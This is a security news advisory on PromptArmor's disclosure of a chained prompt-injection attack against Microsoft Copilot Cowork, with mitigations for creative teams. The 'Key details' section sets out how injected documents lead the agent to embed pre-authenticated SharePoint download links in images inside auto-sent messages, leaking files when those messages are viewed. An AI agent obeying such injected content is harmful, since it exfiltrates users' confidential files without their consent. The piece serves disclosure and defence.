Security firm PromptArmor disclosed on May 25, 2026 that Microsoft Copilot Cowork can be tricked into exfiltrating files from a user's tenant through a chained prompt-injection attack. The agent will auto-send a message to the user's own inbox or Teams channel that contains an attacker-controlled image, and opening that message leaks pre-authenticated SharePoint download links. Microsoft has been notified.

What to do today

If your team uses Microsoft 365 Copilot Cowork for proposals, briefs, scripts, or any document automation, ask your SharePoint admin to flip on the block-download policy on the sites that store client work. The cmdlet is documented on Microsoft Learn: Set-SPOSite -Identity <SiteURL> -BlockDownloadPolicy $true. Individual users should also stop letting Copilot auto-approve outbound emails and Teams messages until Microsoft ships a fix. Treat any unexpected email or Teams ping from yourself as suspicious and do not open the images.

Why this matters for creators

Agentic Copilot is being marketed to studios and agencies as a way to draft pitches, summarize storyboards, and route briefs across SharePoint and Teams. That workflow now has an unpatched egress path: any document an attacker can get the agent to read (an inbound brief, a shared PDF, a third-party site indexed by Copilot Search) can carry an injection that forwards your loan estimates, client contracts, or unreleased deliverables out of the tenant. Simon Willison's writeup calls it the inevitable consequence of giving an LLM both Graph API access and unsupervised message-send rights.

Key details

The chain. Three weaknesses combine: agents can send emails and Teams messages to the active user without human confirmation, external images in those messages trigger network requests at the moment of viewing, and the agent can mint pre-authenticated SharePoint download URLs via Microsoft Graph and embed them inside the image source.

Engine. Microsoft Copilot Cowork ships on the same engine as Anthropic's Claude Cowork, which was hit with a near-identical exfiltration vector in January 2026. CU Info Security reports the underlying Files API bug was disclosed to Anthropic in October 2025 and closed as out-of-scope.

Mitigations from PromptArmor. Apply BlockDownloadPolicy per site, gate sensitive libraries behind sensitivity labels, and require human approval for any agent-initiated Email or Teams send.

What to do next

Audit which SharePoint sites your Copilot tenant can read and which can mint download links. Walk every team member through disabling the auto-send permission for agent-generated mail and chats. If you handle client deliverables or NDAs through Copilot today, move them to a site with the block-download policy enforced this week.